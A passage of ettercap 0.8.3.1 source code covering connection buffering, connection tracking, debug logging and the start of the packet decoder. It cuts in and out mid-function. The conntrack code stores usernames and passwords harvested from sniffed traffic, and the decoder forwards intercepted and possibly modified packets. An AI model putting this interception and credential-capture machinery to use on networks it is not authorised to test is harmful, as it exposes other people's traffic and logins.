conn_buf *cb, struct packet_object *po) { struct conn_pck_list *p; struct conn_pck_list *e; SAFE_CALLOC(p, 1, sizeof(struct conn_pck_list)); /* * we add the sizeof because if the packets have 0 length * (ack packets) the real memory occupation will overflow * the max_size */ p->size = sizeof(struct conn_pck_list) + po->DATA.disp_len; memcpy(&p->L3_src, &po->L3.src, sizeof(struct ip_addr)); /* * we cant handle the packet, the buffer * is too small */ if (p->size > cb->max_size) { DEBUG_MSG("connbuf_add: buffer too small %d %d\n", (int)cb->max_size, (int)p->size); SAFE_FREE(p); return 0; } /* copy the buffer */ SAFE_CALLOC(p->buf, po->DATA.disp_len, sizeof(u_char)); memcpy(p->buf, po->DATA.disp_data, po->DATA.disp_len); CONNBUF_LOCK(cb->connbuf_mutex); /* * check the total size and make adjustment * if we have to free some packets */ if (cb->size + p->size > cb->max_size) { struct conn_pck_list *tmp = NULL; TAILQ_FOREACH_REVERSE_SAFE(e, &cb->connbuf_tail, next, connbuf_head, tmp) { /* we have freed enough bytes */ if (cb->size + p->size <= cb->max_size) break; /* calculate the new size */ cb->size -= e->size; /* remove the elemnt */ SAFE_FREE(e->buf); TAILQ_REMOVE(&cb->connbuf_tail, e, next); SAFE_FREE(e); } } /* insert the packet in the tail */ TAILQ_INSERT_HEAD(&cb->connbuf_tail, p, next); /* update the total buffer size */ cb->size += p->size; CONNBUF_UNLOCK(cb->connbuf_mutex); return 0; } /* * empty a give buffer. * all the elements in the list are deleted */ void connbuf_wipe(struct conn_buf *cb) { struct conn_pck_list *e; DEBUG_MSG("connbuf_wipe"); CONNBUF_LOCK(cb->connbuf_mutex); /* delete the list */ while ((e = TAILQ_FIRST(&cb->connbuf_tail)) != TAILQ_END(&cb->connbuf_tail)) { TAILQ_REMOVE(&cb->connbuf_tail, e, next); SAFE_FREE(e->buf); SAFE_FREE(e); } /* reset the buffer */ cb->size = 0; TAILQ_INIT(&cb->connbuf_tail); CONNBUF_UNLOCK(cb->connbuf_mutex); } /* * print the content of a buffer * you can print only one side of the communication * by specifying the L3_src address, or NULL to * print all the packet in order (joined view). * * returns the number of printed chars */ int connbuf_print(struct conn_buf *cb, void (*func)(u_char *, size_t, struct ip_addr *L3_src)) { struct conn_pck_list *e; int n = 0; CONNBUF_LOCK(cb->connbuf_mutex); /* print the buffer */ TAILQ_FOREACH_REVERSE(e, &cb->connbuf_tail, next, connbuf_head) { /* * remember that the size is comprehensive * of the struct size */ func(e->buf, e->size - sizeof(struct conn_pck_list), &e->L3_src); n += e->size - sizeof(struct conn_pck_list); } CONNBUF_UNLOCK(cb->connbuf_mutex); return n; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_conntrack.c000664 000000 000000 00000053114 13711276346 017052 0ustar00rootroot000000 000000 /* ettercap -- connection list handling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include /* globals */ /* the hash table used to index the tailq */ struct conn_hash_search { struct conn_tail *cl; LIST_ENTRY(conn_hash_search) next; }; #define TABBIT 10 /* 2^10 bit tab entries: 1024 LISTS */ #define TABSIZE (1 << TABBIT) #define TABMASK (TABSIZE - 1) /* * the connection list. * this list is created adding new element in the tail. * the search method is established in the search function. * an hash table is used and it is double-linked with the * tailq so from each element you can delete the corresponding * in the tailq or viceversa */ static TAILQ_HEAD(conn_head, conn_tail) conntrack_tail_head = TAILQ_HEAD_INITIALIZER(conntrack_tail_head); static LIST_HEAD(, conn_hash_search) conntrack_search_head[TABSIZE]; /* global mutex on connections list */ static pthread_mutex_t conntrack_mutex = PTHREAD_MUTEX_INITIALIZER; #define CONNTRACK_LOCK do{ pthread_mutex_lock(&conntrack_mutex); }while(0) #define CONNTRACK_UNLOCK do{ pthread_mutex_unlock(&conntrack_mutex); }while(0) /* protos */ void __init conntrack_init(void); static void conntrack_parse(struct packet_object *po); static u_int32 conntrack_hash(struct packet_object *po); static struct conn_object *conntrack_search(struct packet_object *po); static void conntrack_update(struct conn_object *co, struct packet_object *po); static void conntrack_add(struct packet_object *po); static void conntrack_del(struct conn_object *co); static int conntrack_match(struct conn_object *co, struct packet_object *po); void conntrack_hook(struct conn_object *co, struct packet_object *po); /************************************************/ /* * add the hook function */ void __init conntrack_init(void) { /* receive all the top half packets */ hook_add(HOOK_DISPATCHER, &conntrack_parse); } /* * the conntrack main() */ static void conntrack_parse(struct packet_object *po) { struct conn_object *conn; CONNTRACK_LOCK; /* search if the connection already exists */ conn = conntrack_search(po); /* update if it was found, else add to the list */ if (conn) conntrack_update(conn, po); else conntrack_add(po); CONNTRACK_UNLOCK; } /* * calculate the hash for a packet object */ static u_int32 conntrack_hash(struct packet_object *po) { u_int32 hash_array[3]; /* * put them in an array and then compute the hash on the array. * use XOR on src and dst because the hash must be equal for * packets from dst to src and viceversa */ hash_array[0] = fnv_32((u_char *)&po->L3.src, sizeof(struct ip_addr)) ^ fnv_32((u_char *)&po->L3.dst, sizeof(struct ip_addr)); hash_array[1] = po->L4.src ^ po->L4.dst; hash_array[2] = po->L4.proto; /* compute the resulting hash */ return fnv_32((u_char *)&hash_array, sizeof(hash_array)) & TABMASK; } /* * search the connection in the connection table * and return the pointer. */ static struct conn_object *conntrack_search(struct packet_object *po) { struct conn_hash_search *cs; u_int32 h; /* use the hash table to find the connection in the tailq */ h = conntrack_hash(po); LIST_FOREACH(cs, &conntrack_search_head[h], next) { if (conntrack_match(cs->cl->co, po) == E_SUCCESS) { return cs->cl->co; } } return NULL; #if 0 struct conn_tail *cl; /* search in the list sequentially */ TAILQ_FOREACH(cl, &conntrack_tail_head, next) { if (conntrack_match(cl->co, po) == E_SUCCESS) { return cl->co; } } return NULL; #endif } /* * update the variable parameters in the connection struct. * the status, the buffer and the timestamp will be updated */ static void conntrack_update(struct conn_object *co, struct packet_object *po) { /* update the timestamp */ gettimeofday(&co->ts, 0); /* update the status for TCP conn */ if (po->L4.flags & TH_SYN) co->status = CONN_OPENING; else if (po->L4.flags & TH_FIN) co->status = CONN_CLOSING; else if (po->L4.flags & TH_ACK) { /* syn + ack, ack */ if (co->status == CONN_OPENING ) co->status = CONN_OPEN; /* fin + ack, ack */ else if (co->status == CONN_CLOSING) co->status = CONN_CLOSED; } if (po->L4.flags & TH_PSH) co->status = CONN_ACTIVE; if (po->L4.flags & TH_RST) co->status = CONN_KILLED; /* update the buffer */ connbuf_add(&co->data, po); /* update the status for UDP conn */ if (po->L4.proto == NL_TYPE_UDP) co->status = CONN_ACTIVE; /* * update the byte count * use DATA.len and not DATA.disp_len to have an * effective count of byte trasferred, disp_data * may be longer or shorted than DATA.data */ co->xferred += po->DATA.len; if(!ip_addr_cmp(&co->L3_addr1, &po->L3.src)) co->tx += po->DATA.len; else co->rx += po->DATA.len; /* * update the flags: * if the packet was modified or dropped, the connection * must be marked as well. */ if (po->flags & PO_MODIFIED || po->flags & PO_DROPPED) co->flags |= CONN_MODIFIED; /* * update the password * always overwrite the old one, a better one may * has been collected... */ if (po->DISSECTOR.user) { SAFE_FREE(co->DISSECTOR.user); SAFE_FREE(co->DISSECTOR.pass); SAFE_FREE(co->DISSECTOR.info); co->DISSECTOR.user = strdup(po->DISSECTOR.user); if (po->DISSECTOR.pass) co->DISSECTOR.pass = strdup(po->DISSECTOR.pass); if (po->DISSECTOR.info) co->DISSECTOR.info = strdup(po->DISSECTOR.info); } /* execute the hookpoint */ conntrack_hook(co, po); } /* * create a new entry in the tail */ static void conntrack_add(struct packet_object *po) { struct conn_tail *cl; struct conn_hash_search *cs; DEBUG_MSG("conntrack_add: NEW CONNECTION"); /* alloc the list element */ SAFE_CALLOC(cl, 1, sizeof(struct conn_tail)); /* alloc the conn object in the element */ SAFE_CALLOC(cl->co, 1, sizeof(struct conn_object)); /* * here we create the connection. * this is the first packet seen... * addr1 will be the source and addr2 the dest */ /* fill the addresses */ memcpy(&cl->co->L2_addr1, &po->L2.src, MEDIA_ADDR_LEN); memcpy(&cl->co->L2_addr2, &po->L2.dst, MEDIA_ADDR_LEN); memcpy(&cl->co->L3_addr1, &po->L3.src, sizeof(struct ip_addr)); memcpy(&cl->co->L3_addr2, &po->L3.dst, sizeof(struct ip_addr)); /* copy the port */ cl->co->L4_addr1 = po->L4.src; cl->co->L4_addr2 = po->L4.dst; cl->co->L4_proto = po->L4.proto; /* initialize the connection buffer */ connbuf_init(&cl->co->data, EC_GBL_CONF->connection_buffer); /* update the connection entry */ conntrack_update(cl->co, po); /* alloc the hash table element */ SAFE_CALLOC(cs, 1, sizeof(struct conn_hash_search)); /* set the pointer to the list */ cs->cl = cl; /* * set the pointer to the element in the hash table * it is used when a connection is deleted because * even the element in the hash table must be deleted */ cl->cs = cs; /* insert the new connection in the tail */ TAILQ_INSERT_TAIL(&conntrack_tail_head, cl, next); /* insert the new connection in the tail */ LIST_INSERT_HEAD(&conntrack_search_head[conntrack_hash(po)], cs, next); } /* * is the packet object belonging to this connection ? */ static int conntrack_match(struct conn_object *co, struct packet_object *po) { /* different protocol, they don't match */ if (co->L4_proto != po->L4.proto) return -E_INVALID; /* match it in one way... */ if (!ip_addr_cmp(&co->L3_addr1, &po->L3.src) && !ip_addr_cmp(&co->L3_addr2, &po->L3.dst) && co->L4_addr1 == po->L4.src && co->L4_addr2 == po->L4.dst) return E_SUCCESS; /* ...and in the other */ if (!ip_addr_cmp(&co->L3_addr1, &po->L3.dst) && !ip_addr_cmp(&co->L3_addr2, &po->L3.src) && co->L4_addr1 == po->L4.dst && co->L4_addr2 == po->L4.src) return E_SUCCESS; return -E_NOMATCH; } /* * erase a connection object */ static void conntrack_del(struct conn_object *co) { struct ct_hook_list *h, *tmp; /* remove the hooks */ SLIST_FOREACH_SAFE(h, &co->hook_head, next, tmp) { SLIST_REMOVE(&co->hook_head, h, ct_hook_list, next); SAFE_FREE(h); } /* wipe the associated buffer */ connbuf_wipe(&co->data); SAFE_FREE(co); } /* * erase the whole connections list */ void conntrack_purge(void) { struct conn_tail *cl, *tmp; DEBUG_MSG("conntrack_purge"); TAILQ_FOREACH_SAFE(cl, &conntrack_tail_head, next, tmp) { /* don't erase the connection if it is viewed */ if (cl->co->flags & CONN_VIEWING) continue; CONNTRACK_LOCK; /* wipe the connection */ conntrack_del(cl->co); /* remove the element in the hash table */ LIST_REMOVE(cl->cs, next); SAFE_FREE(cl->cs); /* remove the element in the tailq */ TAILQ_REMOVE(&conntrack_tail_head, cl, next); SAFE_FREE(cl); CONNTRACK_UNLOCK; } } EC_THREAD_FUNC(conntrack_timeouter) { struct timeval ts; struct timeval diff; struct conn_tail *cl; struct conn_tail *tmp = NULL; size_t sec; /* variable not used */ (void) EC_THREAD_PARAM; /* initialize the thread */ ec_thread_init(); DEBUG_MSG("conntrack_timeouter: activated !"); LOOP { /* * sleep for the maximum time possible * (determined as the minumum of the timeouts) */ sec = MIN(EC_GBL_CONF->connection_idle, EC_GBL_CONF->connection_timeout); DEBUG_MSG("conntrack_timeouter: sleeping for %lu sec", (unsigned long)sec); /* always check if a cancel is requested */ CANCELLATION_POINT(); ec_usleep(SEC2MICRO(sec)); DEBUG_MSG("conntrack_timeouter: woke up"); /* get current time */ gettimeofday(&ts, NULL); /* * the timeouter is the only thread that erase a connection * so we are sure that the list will be consistent till the * end. * we can lock and unlock every time we handle an element of * the list to permit the conntrack functions to operate on the * list even when timeouter goes thru the list */ TAILQ_FOREACH_SAFE(cl, &conntrack_tail_head, next, tmp) { /* don't erase the connection if it is viewed */ if (cl->co->flags & CONN_VIEWING) continue; CONNTRACK_LOCK; /* calculate the difference */ time_sub(&ts, &cl->co->ts, &diff); /* * update it only if the staus is active, * all the other status must be left as they are */ if (cl->co->status == CONN_ACTIVE && diff.tv_sec >= EC_GBL_CONF->connection_idle) cl->co->status = CONN_IDLE; /* delete the timeouted connections */ if (diff.tv_sec >= EC_GBL_CONF->connection_timeout) { /* wipe the connection */ conntrack_del(cl->co); /* remove the element in the hash table */ LIST_REMOVE(cl->cs, next); SAFE_FREE(cl->cs); /* remove the element in the tailq */ TAILQ_REMOVE(&conntrack_tail_head, cl, next); SAFE_FREE(cl); } CONNTRACK_UNLOCK; CANCELLATION_POINT(); } } return NULL; } /* * add the fucntion 'func' to the hookpoint of the * connection owning the packet object */ int conntrack_hook_packet_add(struct packet_object *po, void (*func)(struct packet_object *po)) { struct conn_object *conn; CONNTRACK_LOCK; /* search the connection already exists */ conn = conntrack_search(po); /* * if the connection already exist, add the hook function * else create the entry for the connection and add the hook * this is useful to add hooks for future connections */ /* create the fake connection */ if (!conn) { DEBUG_MSG("conntrack_hook_packet_add: ephemeral connection"); conntrack_add(po); conn = conntrack_search(po); } /* add the hook point */ if (conn) { struct ct_hook_list *h; DEBUG_MSG("conntrack_hook_packet_add: existing connection"); SAFE_CALLOC(h, 1, sizeof(struct ct_hook_list)); /* set the hook function */ h->func = func; SLIST_INSERT_HEAD(&conn->hook_head, h, next); CONNTRACK_UNLOCK; return E_SUCCESS; } CONNTRACK_UNLOCK; return -E_NOTFOUND; } /* * removes a hook from a connection */ int conntrack_hook_packet_del(struct packet_object *po, void (*func)(struct packet_object *po)) { struct conn_object *conn; DEBUG_MSG("conntrack_hook_packet_del"); CONNTRACK_LOCK; /* search the connection already exists */ conn = conntrack_search(po); /* remove the hook function only if the connection exists */ if (conn) { struct ct_hook_list *h; SLIST_FOREACH(h, &conn->hook_head, next) { if (h->func == func) { SLIST_REMOVE(&conn->hook_head, h, ct_hook_list, next); SAFE_FREE(h); break; } } CONNTRACK_UNLOCK; return E_SUCCESS; } CONNTRACK_UNLOCK; return -E_NOTFOUND; } /* * add the fucntion 'func' to the hookpoint of the * connection 'co' */ int conntrack_hook_conn_add(struct conn_object *co, void (*func)(struct packet_object *po)) { struct ct_hook_list *h; CONNTRACK_LOCK; /* add the hook point */ DEBUG_MSG("conntrack_hook_conn_add"); SAFE_CALLOC(h, 1, sizeof(struct ct_hook_list)); /* set the hook function */ h->func = func; SLIST_INSERT_HEAD(&co->hook_head, h, next); CONNTRACK_UNLOCK; return E_SUCCESS; } /* * removes a hook from a connection */ int conntrack_hook_conn_del(struct conn_object *co, void (*func)(struct packet_object *po)) { struct ct_hook_list *h; DEBUG_MSG("conntrack_hook_conn_del"); CONNTRACK_LOCK; SLIST_FOREACH(h, &co->hook_head, next) { if (h->func == func) { SLIST_REMOVE(&co->hook_head, h, ct_hook_list, next); SAFE_FREE(h); break; } } CONNTRACK_UNLOCK; return E_SUCCESS; } /* * executes the hook point */ void conntrack_hook(struct conn_object *co, struct packet_object *po) { struct ct_hook_list *h; /* pass the po to all the hooked functions */ SLIST_FOREACH(h, &co->hook_head, next) { h->func(po); } } /* * fill the desc and return the next/prev element */ void * conntrack_print(int mode, void *list, char **desc, size_t len) { struct conn_tail *c = (struct conn_tail *)list; struct conn_tail *cl; char src[MAX_ASCII_ADDR_LEN]; char dst[MAX_ASCII_ADDR_LEN]; char proto[2], status[8], flags[2]; #ifdef HAVE_GEOIP size_t slen; #endif /* NULL is used to retrieve the first element */ if (list == NULL) return TAILQ_FIRST(&conntrack_tail_head); /* the caller wants the description */ if (desc != NULL) { /* IP address to string */ ip_addr_ntoa(&c->co->L3_addr1, src); ip_addr_ntoa(&c->co->L3_addr2, dst); /* determine the protocol */ conntrack_protostr(c->co, proto, sizeof(proto)); /* determine the status */ conntrack_statusstr(c->co, status, sizeof(status)); /* determine the flags */ conntrack_flagstr(c->co, flags, sizeof(flags)); snprintf(*desc, len, "%1s %15s:%-5d - %15s:%-5d %1s %s TX: %lu RX: %lu", flags, src, ntohs(c->co->L4_addr1), dst, ntohs(c->co->L4_addr2), proto, status, (unsigned long)c->co->tx, (unsigned long)c->co->rx); #ifdef HAVE_GEOIP /* determine current string length */ slen = strlen(*desc); /* check if enough space is available to append the GeoIP info */ if (len - slen > 14 && EC_GBL_CONF->geoip_support_enable) { snprintf(*desc + slen, len - slen, ", CC: %2s > %2s", geoip_ccode_by_ip(&c->co->L3_addr1), geoip_ccode_by_ip(&c->co->L3_addr2)); } #endif } /* return the next/prev/current to the caller */ switch (mode) { case -1: return TAILQ_PREV(c, conn_head, next); break; case +1: return TAILQ_NEXT(c, next); break; case 0: /* if exists in the list, return it */ TAILQ_FOREACH(cl, &conntrack_tail_head, next) { if (cl == c) return c; } /* else, return NULL */ return NULL; default: return list; break; } return NULL; } /* * copy the connection object pointer to conn and return the next/prev element */ void * conntrack_get(int mode, void *list, struct conn_object **conn) { struct conn_tail *c = (struct conn_tail *)list; struct conn_tail *cl; /* NULL is used to retrieve the first element */ if (list == NULL) return TAILQ_FIRST(&conntrack_tail_head); /* the caller wants the connection object */ if (conn != NULL) *conn = c->co; /* return the next/prev/current to the caller */ switch (mode) { case -1: return TAILQ_PREV(c, conn_head, next); break; case +1: return TAILQ_NEXT(c, next); break; case 0: /* if exists in the list, return it */ TAILQ_FOREACH(cl, &conntrack_tail_head, next) { if (cl == c) return c; } /* else, return NULL */ return NULL; default: return list; break; } return NULL; } /* * copies the protocol string of a given connection object into pstr * E_SUCCESS is returned on success * -E_INVALID is returned if parameters are not initialized */ int conntrack_protostr(struct conn_object *conn, char *pstr, int len) { if (pstr == NULL || conn == NULL) return -E_INVALID; memset(pstr, 0, len); switch (conn->L4_proto) { case NL_TYPE_UDP: strncpy(pstr, "UDP", len - 1); break; case NL_TYPE_TCP: strncpy(pstr, "TCP", len - 1); break; default: strncpy(pstr, " ", len - 1); } return E_SUCCESS; } /* * copies the flags string of a given connection object into pstr * E_SUCCESS is returned on success * -E_INVALID is returned if parameters are not initialized */ int conntrack_flagstr(struct conn_object *conn, char *pstr, int len) { if (pstr == NULL || conn == NULL) return -E_INVALID; memset(pstr, 0, len); /* * account collection has precedence over injection/modification */ if (conn->flags & CONN_MODIFIED) strncpy(pstr, "M", len - 1); if (conn->flags & CONN_INJECTED) strncpy(pstr, "I", len - 1); if (conn->DISSECTOR.user) strncpy(pstr, "*", len - 1); return E_SUCCESS; } /* * copies the status string of a given connection object into pstr * E_SUCCESS is returned on success * -E_INVALID is returned if parameters are not initialized */ int conntrack_statusstr(struct conn_object *conn, char *pstr, int len) { if (pstr == NULL || conn == NULL) return -E_INVALID; memset(pstr, 0, len); /* determine the status */ switch (conn->status) { case CONN_IDLE: strncpy(pstr, "idle ", len - 1); break; case CONN_OPENING: strncpy(pstr, "opening", len - 1); break; case CONN_OPEN: strncpy(pstr, "open ", len - 1); break; case CONN_ACTIVE: strncpy(pstr, "active ", len - 1); break; case CONN_CLOSING: strncpy(pstr, "closing", len - 1); break; case CONN_CLOSED: strncpy(pstr, "closed ", len - 1); break; case CONN_KILLED: strncpy(pstr, "killed ", len - 1); break; } return E_SUCCESS; } /* * copies the country codes of a given connection object into pstr * E_SUCCESS is returned on success * -E_INVALID is returned if parameters are not initialized * -E_INITFAIL if geoip API is not initialized properly */ int conntrack_countrystr(struct conn_object *conn, char *pstr, int len) { #ifdef HAVE_GEOIP const char *ccode_src, *ccode_dst = NULL; #endif if (pstr == NULL || conn == NULL || len < 8) return -E_INVALID; #ifdef HAVE_GEOIP if (!EC_GBL_CONF->geoip_support_enable) return -E_INITFAIL; if ((ccode_src = geoip_ccode_by_ip(&conn->L3_addr1)) == NULL) return -E_INITFAIL; if ((ccode_dst = geoip_ccode_by_ip(&conn->L3_addr2)) == NULL) return -E_INITFAIL; snprintf(pstr, len, "%2s > %2s", ccode_src, ccode_dst); #endif return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_debug.c000664 000000 000000 00000010501 13711276346 016147 0ustar00rootroot000000 000000 /* ettercap -- debug module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #ifdef HAVE_EC_LUA #include #endif #include #include #ifdef DEBUG #include #include #ifdef HAVE_PCRE #include #endif #include #include #include #include #ifdef HAVE_SYS_UTSNAME_H #include #ifdef OS_LINUX #include #endif #endif /* globals */ FILE *debug_file = NULL; static pthread_mutex_t debug_mutex = PTHREAD_MUTEX_INITIALIZER; #define DEBUG_LOCK do{ pthread_mutex_lock(&debug_mutex); } while(0) #define DEBUG_UNLOCK do{ pthread_mutex_unlock(&debug_mutex); } while(0) /* protos */ static void debug_close(void); /**********************************/ void debug_init(void) { #ifdef HAVE_SYS_UTSNAME_H struct utsname buf; #endif DEBUG_LOCK; if ((debug_file = fopen (EC_GBL_DEBUG_FILE, "w")) == NULL) ERROR_MSG("Couldn't open for writing %s", EC_GBL_DEBUG_FILE); fprintf (debug_file, "\n==============================================================\n\n"); fprintf (debug_file, "-> ${prefix} %s\n", INSTALL_PREFIX); fprintf (debug_file, "-> ${exec_prefix} %s\n", INSTALL_EXECPREFIX); fprintf (debug_file, "-> ${bindir} %s\n", INSTALL_BINDIR); fprintf (debug_file, "-> ${libdir} %s\n", INSTALL_LIBDIR); fprintf (debug_file, "-> ${sysconfdir} %s\n", INSTALL_SYSCONFDIR); fprintf (debug_file, "-> ${datadir} %s\n\n", INSTALL_DATADIR); #ifdef HAVE_EC_LUA ec_lua_print_info(debug_file); #endif fprintf (debug_file, "-> %s %s\n\n", EC_GBL_PROGRAM, EC_GBL_VERSION); #ifdef HAVE_SYS_UTSNAME_H uname(&buf); fprintf (debug_file, "-> running on %s %s %s\n", buf.sysname, buf.release, buf.machine); #endif #if defined (__GNUC__) && defined (__GNUC_MINOR__) fprintf (debug_file, "-> compiled with gcc %d.%d (%s)\n", __GNUC__, __GNUC_MINOR__, CC_VERSION); #endif #if defined (__GLIBC__) && defined (__GLIBC_MINOR__) fprintf (debug_file, "-> glibc version %d.%d\n", __GLIBC__, __GLIBC_MINOR__); #endif fprintf(debug_file, "-> %s\n", pcap_lib_version()); fprintf(debug_file, "-> libnet version %s\n", LIBNET_VERSION); fprintf(debug_file, "-> libz version %s\n", zlibVersion()); #ifdef HAVE_PCRE fprintf(debug_file, "-> libpcre version %s\n", pcre_version()); #endif #ifdef HAVE_EC_LUA ec_lua_print_version(debug_file); #endif fprintf (debug_file, "-> lib %s\n", SSLeay_version(SSLEAY_VERSION)); fprintf (debug_file, "-> headers %s\n", OPENSSL_VERSION_TEXT); fprintf (debug_file, "\n\nDEVICE OPENED FOR %s DEBUGGING\n\n", EC_GBL_PROGRAM); fflush(debug_file); DEBUG_UNLOCK; atexit(debug_close); } void debug_close(void) { DEBUG_LOCK; fprintf (debug_file, "\n\nDEVICE CLOSED FOR DEBUGGING\n\n"); fflush(debug_file); fclose (debug_file); /* set it to null and check from other threads */ debug_file = NULL; DEBUG_UNLOCK; } void debug_msg(const char *message, ...) { va_list ap; char debug_message[strlen(message)+2]; DEBUG_LOCK; /* if it was closed by another thread on exit */ if (debug_file == NULL) return; fprintf(debug_file, "[%9s]\t", ec_thread_getname(ec_thread_getpid(NULL))); strlcpy(debug_message, message, sizeof(debug_message)); strlcat(debug_message, "\n", sizeof(debug_message)); va_start(ap, message); vfprintf(debug_file, debug_message, ap); va_end(ap); fflush(debug_file); DEBUG_UNLOCK; } #endif /* DEBUG */ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_decode.c000664 000000 000000 00000030032 13711276346 016305 0ustar00rootroot000000 000000 /* ettercap -- decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef OS_BSD_FREE #include #endif /* globals */ static struct dec_entry *protocols_table; static unsigned protocols_num; static bool table_sorted = false; struct dec_entry { u_int32 type; u_int8 level; bool active; FUNC_DECODER_PTR(decoder); }; /* protos */ void __init data_init(void); FUNC_DECODER(decode_data); static void sort_decoders(void); static int cmp_decoders(const void *va, const void *vb); static struct dec_entry* find_entry(u_int8 level, u_int32 type); void **get_decoders(u_int8 level, u_int32 type); /* mutexes */ static pthread_mutex_t decoders_mutex = PTHREAD_MUTEX_INITIALIZER; #define DECODERS_LOCK do{ pthread_mutex_lock(&decoders_mutex); } while(0) #define DECODERS_UNLOCK do{ pthread_mutex_unlock(&decoders_mutex); } while(0) static pthread_mutex_t dump_mutex = PTHREAD_MUTEX_INITIALIZER; #define DUMP_LOCK do{ pthread_mutex_lock(&dump_mutex); } while(0) #define DUMP_UNLOCK do{ pthread_mutex_unlock(&dump_mutex); } while(0) /*******************************************/ void ec_decode(u_char *param, const struct pcap_pkthdr *pkthdr, const u_char *pkt) { FUNC_DECODER_PTR(packet_decoder); struct packet_object po; u_int len; u_char *data; int datalen; struct iface_env *iface; iface = (struct iface_env *)param; CANCELLATION_POINT(); /* start the timer for the stats */ stats_half_start(&EC_GBL_STATS->bh); /* XXX -- remove this */ #if 0 if (!EC_GBL_OPTIONS->quiet) USER_MSG("CAPTURED: 0x%04x bytes form %s\n", pkthdr->caplen, iface->name ); #endif if (EC_GBL_OPTIONS->read) /* update the offset pointer */ EC_GBL_PCAP->dump_off = ftell(pcap_file(EC_GBL_IFACE->pcap)); else { /* update the statistics */ stats_update(); } /* * dump packet to file if specified on command line * it dumps all the packets disregarding the filter * * do not perform the operation if we are reading from another * filedump. See below where the file is dumped when reading * form other files (useful for decription). */ if (EC_GBL_OPTIONS->write && !EC_GBL_OPTIONS->read) { /* * we need to lock this because in SM_BRIDGED the * packets are dumped in the log file by two threads */ DUMP_LOCK; pcap_dump((u_char *)EC_GBL_PCAP->dump, pkthdr, pkt); DUMP_UNLOCK; } /* bad packet */ if (pkthdr->caplen > UINT16_MAX) { USER_MSG("Bad packet detected, skipping...\n"); return; } /* * copy the packet in a "dedicated" buffer * we don't want other packets after the end of the packet (as in BPF) * * also keep the buffer aligned ! * the alignment is set by the media decoder. */ memcpy(iface->pbuf + EC_GBL_PCAP->align, pkt, pkthdr->caplen); /* extract data and datalen from pcap packet */ data = (u_char *)iface->pbuf + EC_GBL_PCAP->align; datalen = pkthdr->caplen; /* * deal with trucated packets: * if someone has created a pcap file with the snaplen * too small we have to skip the packet (is not interesting for us) */ if (EC_GBL_PCAP->snaplen <= datalen) { USER_MSG("Truncated packet detected, skipping...\n"); return; } /* alloc the packet object structure to be passet through decoders */ packet_create_object(&po, data, datalen); /* Be sure to NULL terminate our data buffer */ *(data + datalen) = 0; /* set the po timestamp */ memcpy(&po.ts, &pkthdr->ts, sizeof(struct timeval)); /* set the interface where the packet was captured */ if (EC_GBL_OPTIONS->iface && !strcmp(iface->name, EC_GBL_OPTIONS->iface)) po.flags |= PO_FROMIFACE; else if (EC_GBL_OPTIONS->iface_bridge && !strcmp(iface->name, EC_GBL_OPTIONS->iface_bridge)) po.flags |= PO_FROMBRIDGE; /* HOOK POINT: RECEIVED */ hook_point(HOOK_RECEIVED, &po); /* * by default the packet should not be processed by ettercap. * if the sniffing filter matches it, the flag will be reset. */ po.flags |= PO_IGNORE; /* * start the analysis through the decoders stack * * if the packet can be handled it will reach the top of the stack * where the decoder_data will add it to the top_half queue, * else the packet will not be handled but it should be forwarded * * after this fuction the packet is completed (all flags set) */ packet_decoder = get_decoder(LINK_LAYER, EC_GBL_PCAP->dlt); BUG_IF(packet_decoder == NULL); packet_decoder(data, datalen, &len, &po); /* special case for bridged sniffing */ if (EC_GBL_SNIFF->type == SM_BRIDGED) { EXECUTE(EC_GBL_SNIFF->check_forwarded, &po); EXECUTE(EC_GBL_SNIFF->set_forwardable, &po); } /* XXX - BIG WARNING !! * * if the packet was filtered by the filtering engine * the state of the packet_object is inconsistent ! * the fields in the structure may not reflect the real * packet fields... */ /* use the sniffing method funcion to forward the packet */ if ( (po.flags & PO_FORWARDABLE) && !(po.flags & PO_FORWARDED) ) { /* HOOK POINT: PRE_FORWARD */ hook_point(HOOK_PRE_FORWARD, &po); EXECUTE(EC_GBL_SNIFF->forward, &po); } /* * dump packets to a file from another file. * this is useful when decrypting packets or applying filters * on pcapfile and we want to save the result in a file */ if (EC_GBL_OPTIONS->write && EC_GBL_OPTIONS->read) { DUMP_LOCK; /* reuse the original pcap header, but with the modified packet */ pcap_dump((u_char *)EC_GBL_PCAP->dump, pkthdr, po.packet); DUMP_UNLOCK; } /* * if it is the last packet set the flag * and send the packet to the top half. * we have to do this because the last packet * might be dropped by the filter. */ if (EC_GBL_OPTIONS->read && EC_GBL_PCAP->dump_size == EC_GBL_PCAP->dump_off) { po.flags |= PO_EOF; top_half_queue_add(&po); } /* free the structure */ packet_destroy_object(&po); /* calculate the stats */ stats_half_end(&EC_GBL_STATS->bh, pkthdr->caplen); CANCELLATION_POINT(); return; } /* register the data decoder */ void __init data_init(void) { add_decoder(APP_LAYER, PL_DEFAULT, decode_data); } /* * if the packet reach the top of the stack 